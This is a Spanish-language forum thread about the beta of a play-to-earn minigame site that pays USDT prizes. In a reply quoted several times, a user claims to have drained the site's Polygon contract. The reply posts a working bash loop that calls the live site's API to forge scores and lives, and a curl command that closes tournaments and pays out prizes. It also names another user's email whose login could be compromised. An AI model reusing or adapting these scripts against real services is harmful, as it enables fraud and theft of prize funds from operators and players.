🏆 Mundial 2026 EN VIVO · Próximo: Francia vs Inglaterra entra →

PLAY TO EARN

  • Autor Autor mota419
  • Fecha de inicio Fecha de inicio
mota419

mota419

Curioso
¡Usuario con pocos negocios! ¡Utiliza siempre saldo de Forobeta!
Presentamos oficialmente la Beta abierta de JUEGA Y GANA, una nueva aproximación a los minijuegos web3 enfocada en la sostenibilidad y cero barreras de entrada.

🎮 ¿Qué es el proyecto?Es una plataforma web de torneos de minijuegos casuales. A diferencia del modelo P2E tradicional que requiere comprar tokens o NFTs para participar, nuestra plataforma es completamente gratuita (Free-to-Play).

⚙️ ¿Cómo funciona la economía (Sostenibilidad)?Hemos notado que muchos P2E colapsan porque dependen de la entrada de nuevos jugadores. Nuestro modelo es distinto:

  1. La plataforma está monetizada a través de redes publicitarias premium (Bitmedia, Adsterra, A-ADS).
  2. Los ingresos generados por el tráfico se inyectan en tres pozos de liquidez: Torneo Diario, Torneo Semanal y Torneo Mensual.
  3. Los jugadores con mayor puntaje (y mayor fidelidad/tiempo activo) reclaman los pozos directamente a su wallet.
🛡️ Sistema Anti-TrampasSabemos que los bots arruinan los juegos web. Hemos implementado un escudo en nuestro Back-End que incluye validaciones de debounce y control estricto de los niveles superados, cerrando la puerta a la manipulación de puntajes desde el lado del cliente.

🔗 Enlaces de Interés

Al estar en fase Beta, abrimos este hilo específicamente para recibir el feedback técnico y general de esta comunidad. Estaré respondiendo a todas sus dudas, sugerencias sobre mecánicas o reportes de bugs en los comentarios.
 
Última edición:
tiene buena pinta, exito
 
Presentamos oficialmente la Beta abierta de JUEGA Y GANA, una nueva aproximación a los minijuegos web3 enfocada en la sostenibilidad y cero barreras de entrada.

🎮 ¿Qué es el proyecto?Es una plataforma web de torneos de minijuegos casuales. A diferencia del modelo P2E tradicional que requiere comprar tokens o NFTs para participar, nuestra plataforma es completamente gratuita (Free-to-Play).

⚙️ ¿Cómo funciona la economía (Sostenibilidad)?Hemos notado que muchos P2E colapsan porque dependen de la entrada de nuevos jugadores. Nuestro modelo es distinto:

  1. La plataforma está monetizada a través de redes publicitarias premium (Bitmedia, Adsterra, A-ADS).
  2. Los ingresos generados por el tráfico se inyectan en tres pozos de liquidez: Torneo Diario, Torneo Semanal y Torneo Mensual.
  3. Los jugadores con mayor puntaje (y mayor fidelidad/tiempo activo) reclaman los pozos directamente a su wallet.
🛡️ Sistema Anti-TrampasSabemos que los bots arruinan los juegos web. Hemos implementado un escudo en nuestro Back-End que incluye validaciones de debounce y control estricto de los niveles superados, cerrando la puerta a la manipulación de puntajes desde el lado del cliente.

🔗 Enlaces de Interés

Al estar en fase Beta, abrimos este hilo específicamente para recibir el feedback técnico y general de esta comunidad. Estaré respondiendo a todas sus dudas, sugerencias sobre mecánicas o reportes de bugs en los comentarios.

Solo es un login, dónde puedo encontrar más detalles? o es obligatorio el registro? sin embargo, cuenten con mi apoyo por la idea de P2E y criptos.
 
intente registrarme y no dejo
 
creo que es la fase experimental... aun beta?
 
muy vulnerable amigo, creo que ya te drenaron los 10 USDT que tenias en el contrato de polygon

este script en loop te daba miles de puntos y vidas

Insertar CODE, HTML o PHP:
#!/bin/bash

WALLET="email@email.com"
CONTADOR_PARTIDAS=0

# Función para recargar vidas
recargar_vidas() {
  echo -e "\n[Vidas] --> Recargando vidas..."
  curl -s -X POST https://juega-y-gana-self.vercel.app/api/recharge-lives \
    -H "Content-Type: application/json" \
    -d "{\"walletAddress\":\"$WALLET\"}"
  echo -e "\n"
}

# 1. PASO INICIAL: Recargar vidas antes de empezar el loop
recargar_vidas

# 2. INICIO DEL LOOP INFINITO
while true; do
  ((CONTADOR_PARTIDAS++))
  echo "--------------------------------"
  echo "Iniciando partida #$CONTADOR_PARTIDAS..."

  # Hacer la primera petición para obtener el token
  RESPONSE=$(curl -s -X POST https://juega-y-gana-self.vercel.app/api/start-match \
    -H "Content-Type: application/json" \
    -d "{\"walletAddress\":\"$WALLET\"}")

  # Extraer el matchToken usando jq
  TOKEN=$(echo $RESPONSE | jq -r '.matchToken')

  # Validar que tengamos un token válido
  if [ "$TOKEN" != "null" ] && [ ! -z "$TOKEN" ]; then
    echo "Token obtenido: $TOKEN"
    echo "Actualizando estadísticas..."

    # Enviar estadísticas con el token dinámico
    curl -X POST https://juega-y-gana-self.vercel.app/api/update-stats \
      -H "Content-Type: application/json" \
      -d "{
        \"walletAddress\":\"$WALLET\",
        \"id_juego\":200,
        \"puntos_delta\":200,
        \"current_level\":200,
        \"resultado\":\"win\",
        \"objetos_golpeados_delta\":200,
        \"fidelidad_delta\":0,
        \"matchToken\":\"$TOKEN\"
      }"
    
    echo -e "\nPartida completada con éxito."
  else
    echo "Error: No se pudo obtener el matchToken. Respuesta: $RESPONSE"
  fi

  # 3. Cada 3 partidas completadas, recargar vidas
  if [ $((CONTADOR_PARTIDAS % 3)) -eq 0 ]; then
    recargar_vidas
  fi

  # Un segundo de respiro antes del siguiente ciclo
  sleep 1
done


y este otro cerraba el juego y distribuia el dinerito rico:
Insertar CODE, HTML o PHP:
curl -X POST https://juega-y-gana-self.vercel.app/api/close-tournament \     
  -H "Content-Type: application/json" \
  -d '{"id_semilla":"EL_ID_SEMILLA"}'


luego podías vulnerar el login de "lasecta45@hotmail.com" también
siempre usa tokens jwt

todos los endpoins expuestos, ejemplo
 
Atento a los avances...
 
muy vulnerable amigo, creo que ya te drenaron los 10 USDT que tenias en el contrato de polygon

este script en loop te daba miles de puntos y vidas

Insertar CODE, HTML o PHP:
#!/bin/bash

WALLET="email@email.com"
CONTADOR_PARTIDAS=0

# Función para recargar vidas
recargar_vidas() {
  echo -e "\n[Vidas] --> Recargando vidas..."
  curl -s -X POST https://juega-y-gana-self.vercel.app/api/recharge-lives \
    -H "Content-Type: application/json" \
    -d "{\"walletAddress\":\"$WALLET\"}"
  echo -e "\n"
}

# 1. PASO INICIAL: Recargar vidas antes de empezar el loop
recargar_vidas

# 2. INICIO DEL LOOP INFINITO
while true; do
  ((CONTADOR_PARTIDAS++))
  echo "--------------------------------"
  echo "Iniciando partida #$CONTADOR_PARTIDAS..."

  # Hacer la primera petición para obtener el token
  RESPONSE=$(curl -s -X POST https://juega-y-gana-self.vercel.app/api/start-match \
    -H "Content-Type: application/json" \
    -d "{\"walletAddress\":\"$WALLET\"}")

  # Extraer el matchToken usando jq
  TOKEN=$(echo $RESPONSE | jq -r '.matchToken')

  # Validar que tengamos un token válido
  if [ "$TOKEN" != "null" ] && [ ! -z "$TOKEN" ]; then
    echo "Token obtenido: $TOKEN"
    echo "Actualizando estadísticas..."

    # Enviar estadísticas con el token dinámico
    curl -X POST https://juega-y-gana-self.vercel.app/api/update-stats \
      -H "Content-Type: application/json" \
      -d "{
        \"walletAddress\":\"$WALLET\",
        \"id_juego\":200,
        \"puntos_delta\":200,
        \"current_level\":200,
        \"resultado\":\"win\",
        \"objetos_golpeados_delta\":200,
        \"fidelidad_delta\":0,
        \"matchToken\":\"$TOKEN\"
      }"
   
    echo -e "\nPartida completada con éxito."
  else
    echo "Error: No se pudo obtener el matchToken. Respuesta: $RESPONSE"
  fi

  # 3. Cada 3 partidas completadas, recargar vidas
  if [ $((CONTADOR_PARTIDAS % 3)) -eq 0 ]; then
    recargar_vidas
  fi

  # Un segundo de respiro antes del siguiente ciclo
  sleep 1
done


y este otro cerraba el juego y distribuia el dinerito rico:
Insertar CODE, HTML o PHP:
curl -X POST https://juega-y-gana-self.vercel.app/api/close-tournament \    
  -H "Content-Type: application/json" \
  -d '{"id_semilla":"EL_ID_SEMILLA"}'


luego podías vulnerar el login de "lasecta45@hotmail.com" también
siempre usa tokens jwt

todos los endpoins expuestos, ejemplo
Interesante como lo hiciste bro.
 
Solo es un login, dónde puedo encontrar más detalles? o es obligatorio el registro? sin embargo, cuenten con mi apoyo por la idea de P2E y criptos.
el login es obligatorio para poder guardar los datos que el jugador va a tener dentro del juego como los puntos, premios, tiempo de juego.
los detalles te los doy aqui de como funciona realmente:
la idea de la pagina es crear un sistema descentralizado donde ganas dinero real (usdt) por competir en los torneos diarios, semanales y mensuales. los torneos puedes verlos en la parte superior de la pantalla donde dice "lideres" y hay vas a aver que tipo de torneos estan disponibles y veras abajo que jugadores estan liderando para premios y el valor que se puede ganar.
en el home de la pagina veras los dos juegos que se seleccionan para el torneo del dia y te dice cual es la variable que necesitas para ganar ya sea mayor cantidad de niveles superados, fidelidad que es tiempo en la pagina del juego jugando cualquier juego (son 8), cantidad de objetos atrapados que son los topos, o los carros, o las gemas, o las cartas que juntes, etc...
losp remios se pagan netamente con los ingresos de los anuncios entonces al haber mas usuarios jugando mas impresiones se veran reflejadas y mas dinero sera enviado al pozo de premios, inicialmente los pagos de los premios son bajos por que la pagina esta iniciando y tiene pocos usuarios pero la idea es que a medida que aumenten los usuarios y la cantidad de impresiones los premios asi mismo seubiran y se podran premiar mas puestos.
el minimo de retiro esta dentro del apartado de retiro donde podras retirar directamente a tu billetera de preferencia en usdt por la red polygon.

si quieres saber algo mas no dudes en preguntar.
 
muy vulnerable amigo, creo que ya te drenaron los 10 USDT que tenias en el contrato de polygon

este script en loop te daba miles de puntos y vidas

Insertar CODE, HTML o PHP:
#!/bin/bash

WALLET="email@email.com"
CONTADOR_PARTIDAS=0

# Función para recargar vidas
recargar_vidas() {
  echo -e "\n[Vidas] --> Recargando vidas..."
  curl -s -X POST https://juega-y-gana-self.vercel.app/api/recharge-lives \
    -H "Content-Type: application/json" \
    -d "{\"walletAddress\":\"$WALLET\"}"
  echo -e "\n"
}

# 1. PASO INICIAL: Recargar vidas antes de empezar el loop
recargar_vidas

# 2. INICIO DEL LOOP INFINITO
while true; do
  ((CONTADOR_PARTIDAS++))
  echo "--------------------------------"
  echo "Iniciando partida #$CONTADOR_PARTIDAS..."

  # Hacer la primera petición para obtener el token
  RESPONSE=$(curl -s -X POST https://juega-y-gana-self.vercel.app/api/start-match \
    -H "Content-Type: application/json" \
    -d "{\"walletAddress\":\"$WALLET\"}")

  # Extraer el matchToken usando jq
  TOKEN=$(echo $RESPONSE | jq -r '.matchToken')

  # Validar que tengamos un token válido
  if [ "$TOKEN" != "null" ] && [ ! -z "$TOKEN" ]; then
    echo "Token obtenido: $TOKEN"
    echo "Actualizando estadísticas..."

    # Enviar estadísticas con el token dinámico
    curl -X POST https://juega-y-gana-self.vercel.app/api/update-stats \
      -H "Content-Type: application/json" \
      -d "{
        \"walletAddress\":\"$WALLET\",
        \"id_juego\":200,
        \"puntos_delta\":200,
        \"current_level\":200,
        \"resultado\":\"win\",
        \"objetos_golpeados_delta\":200,
        \"fidelidad_delta\":0,
        \"matchToken\":\"$TOKEN\"
      }"
   
    echo -e "\nPartida completada con éxito."
  else
    echo "Error: No se pudo obtener el matchToken. Respuesta: $RESPONSE"
  fi

  # 3. Cada 3 partidas completadas, recargar vidas
  if [ $((CONTADOR_PARTIDAS % 3)) -eq 0 ]; then
    recargar_vidas
  fi

  # Un segundo de respiro antes del siguiente ciclo
  sleep 1
done


y este otro cerraba el juego y distribuia el dinerito rico:
Insertar CODE, HTML o PHP:
curl -X POST https://juega-y-gana-self.vercel.app/api/close-tournament \    
  -H "Content-Type: application/json" \
  -d '{"id_semilla":"EL_ID_SEMILLA"}'


luego podías vulnerar el login de "lasecta45@hotmail.com" también
siempre usa tokens jwt

todos los endpoins expuestos, ejemplo
creo que ya corregi los errores pero sin embargo gracias por el aporte ya que es muy importante que le hagan ver los errores a uno. aun asi me gustaria saber como mas podrias vulnerar la pagina.
 
Hola, me tomé el atrevimiento de testear tu pagina, vale? Cualquier cosa te digo en son de mejora
 
creo que es la fase experimental... aun beta?
si, aun estamos en esa fase para poder comprobar errores y mejorar lo que mas podamos para asi mismo tener la seguridad de que sea segura para todos los jugadores y tengan sus saldos intactos.
 
Hola, me tomé el atrevimiento de testear tu pagina, vale? Cualquier cosa te digo en son de mejora
claro que si, la idea es que nos hagas ver lo malo y que se puede mejorar.
 
el login es obligatorio para poder guardar los datos que el jugador va a tener dentro del juego como los puntos, premios, tiempo de juego.
los detalles te los doy aqui de como funciona realmente:
la idea de la pagina es crear un sistema descentralizado donde ganas dinero real (usdt) por competir en los torneos diarios, semanales y mensuales. los torneos puedes verlos en la parte superior de la pantalla donde dice "lideres" y hay vas a aver que tipo de torneos estan disponibles y veras abajo que jugadores estan liderando para premios y el valor que se puede ganar.
en el home de la pagina veras los dos juegos que se seleccionan para el torneo del dia y te dice cual es la variable que necesitas para ganar ya sea mayor cantidad de niveles superados, fidelidad que es tiempo en la pagina del juego jugando cualquier juego (son 8), cantidad de objetos atrapados que son los topos, o los carros, o las gemas, o las cartas que juntes, etc...
losp remios se pagan netamente con los ingresos de los anuncios entonces al haber mas usuarios jugando mas impresiones se veran reflejadas y mas dinero sera enviado al pozo de premios, inicialmente los pagos de los premios son bajos por que la pagina esta iniciando y tiene pocos usuarios pero la idea es que a medida que aumenten los usuarios y la cantidad de impresiones los premios asi mismo seubiran y se podran premiar mas puestos.
el minimo de retiro esta dentro del apartado de retiro donde podras retirar directamente a tu billetera de preferencia en usdt por la red polygon.

si quieres saber algo mas no dudes en preguntar.

a la hora de registrarse, te llega el link de "localhost:3000", yo tuve que cambiar ese por tu url.. eso tambien te bloquea no tener usuarios
 
Estoy haciendo la verificación para poder cambiar eso y que lo envíe a la URL exacta pero si es un error mínimo pero a la vez engorroso para los usuarios. Gracias por tu comentario.
 
muy vulnerable amigo, creo que ya te drenaron los 10 USDT que tenias en el contrato de polygon

este script en loop te daba miles de puntos y vidas

Insertar CODE, HTML o PHP:
#!/bin/bash

WALLET="email@email.com"
CONTADOR_PARTIDAS=0

# Función para recargar vidas
recargar_vidas() {
  echo -e "\n[Vidas] --> Recargando vidas..."
  curl -s -X POST https://juega-y-gana-self.vercel.app/api/recharge-lives \
    -H "Content-Type: application/json" \
    -d "{\"walletAddress\":\"$WALLET\"}"
  echo -e "\n"
}

# 1. PASO INICIAL: Recargar vidas antes de empezar el loop
recargar_vidas

# 2. INICIO DEL LOOP INFINITO
while true; do
  ((CONTADOR_PARTIDAS++))
  echo "--------------------------------"
  echo "Iniciando partida #$CONTADOR_PARTIDAS..."

  # Hacer la primera petición para obtener el token
  RESPONSE=$(curl -s -X POST https://juega-y-gana-self.vercel.app/api/start-match \
    -H "Content-Type: application/json" \
    -d "{\"walletAddress\":\"$WALLET\"}")

  # Extraer el matchToken usando jq
  TOKEN=$(echo $RESPONSE | jq -r '.matchToken')

  # Validar que tengamos un token válido
  if [ "$TOKEN" != "null" ] && [ ! -z "$TOKEN" ]; then
    echo "Token obtenido: $TOKEN"
    echo "Actualizando estadísticas..."

    # Enviar estadísticas con el token dinámico
    curl -X POST https://juega-y-gana-self.vercel.app/api/update-stats \
      -H "Content-Type: application/json" \
      -d "{
        \"walletAddress\":\"$WALLET\",
        \"id_juego\":200,
        \"puntos_delta\":200,
        \"current_level\":200,
        \"resultado\":\"win\",
        \"objetos_golpeados_delta\":200,
        \"fidelidad_delta\":0,
        \"matchToken\":\"$TOKEN\"
      }"
   
    echo -e "\nPartida completada con éxito."
  else
    echo "Error: No se pudo obtener el matchToken. Respuesta: $RESPONSE"
  fi

  # 3. Cada 3 partidas completadas, recargar vidas
  if [ $((CONTADOR_PARTIDAS % 3)) -eq 0 ]; then
    recargar_vidas
  fi

  # Un segundo de respiro antes del siguiente ciclo
  sleep 1
done


y este otro cerraba el juego y distribuia el dinerito rico:
Insertar CODE, HTML o PHP:
curl -X POST https://juega-y-gana-self.vercel.app/api/close-tournament \    
  -H "Content-Type: application/json" \
  -d '{"id_semilla":"EL_ID_SEMILLA"}'


luego podías vulnerar el login de "lasecta45@hotmail.com" también
siempre usa tokens jwt

todos los endpoins expuestos, ejemplo
Heroe o Villano jajaja. Buenisimo, ya tienes un pentest gratis. @mota419
 
Estoy haciendo la verificación para poder cambiar eso y que lo envíe a la URL exacta pero si es un error mínimo pero a la vez engorroso para los usuarios. Gracias por tu comentario.
Deberías trabajar bastante de la mano de @username666 ... Al ser una plataforma donde habrá flujo de dinero es importante resolver primero las vulnerabilidades
 
Link de referido!
 
Heroe o Villano jajaja. Buenisimo, ya tienes un pentest gratis. @mota419
Afortunadamente no salieron pero si me gusta que escarven por toda la página para ver que errores corregir, en si, la vida se trata de evitar a los tramposos y todos los comentarios me hi ieron revisar el código y sii vi muchas cosas que pase por alto. La intención es en vez de enfocarme en el problema retroalimentar todos los comentarios y buscar las soluciones ya que la página se está creando para el beneficio de todos y no es justo que tramposos se queden con todo.
 
Atrás
Arriba